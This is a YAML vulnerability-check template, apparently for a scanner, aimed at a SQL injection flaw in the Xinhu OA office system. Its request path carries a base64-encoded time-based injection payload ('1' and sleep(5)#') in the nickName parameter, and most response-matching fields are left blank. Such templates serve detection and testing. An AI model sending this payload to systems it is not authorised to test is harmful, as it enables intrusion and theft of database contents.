25 lines
924 B
YAML
25 lines
924 B
YAML
|
keyword: 信呼OA
|
|||
|
name: 信呼OA SQL注入漏洞
|
|||
|
description: | # 下一行可填写漏洞描述
|
|||
|
信呼OA办公系统是一款开源的且跨平台的办公系统。
|
|||
|
requests: # 为空代表默认或者不启用
|
|||
|
path: "/index.php?m=openmodhetong|openapi&d=task&a=data&ajaxbool=0&nickName=MScgYW5kIHNsZWVwKDUpIw=="
|
|||
|
method: GET
|
|||
|
headers:
|
|||
|
X-Forwarded-For:
|
|||
|
body-raw: |- # 如果需要发送请求体,在下一行开始填写
|
|||
|
|
|||
|
response:
|
|||
|
path: "" # 不填则默认接收此请求的响应包
|
|||
|
status-code: 200
|
|||
|
body: " " # 此处可填写响应体中确认漏洞存在的关键字或者其他信息
|
|||
|
time: # 此处填写响应包响应时间,默认不启用
|
|||
|
headers:
|
|||
|
Server:
|
|||
|
Content-type:
|
|||
|
Content-length:
|
|||
|
Date:
|
|||
|
Connection:
|
|||
|
impact: | # 下一行可填写漏洞影响
|
|||
|
信呼OA办公系统存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。
|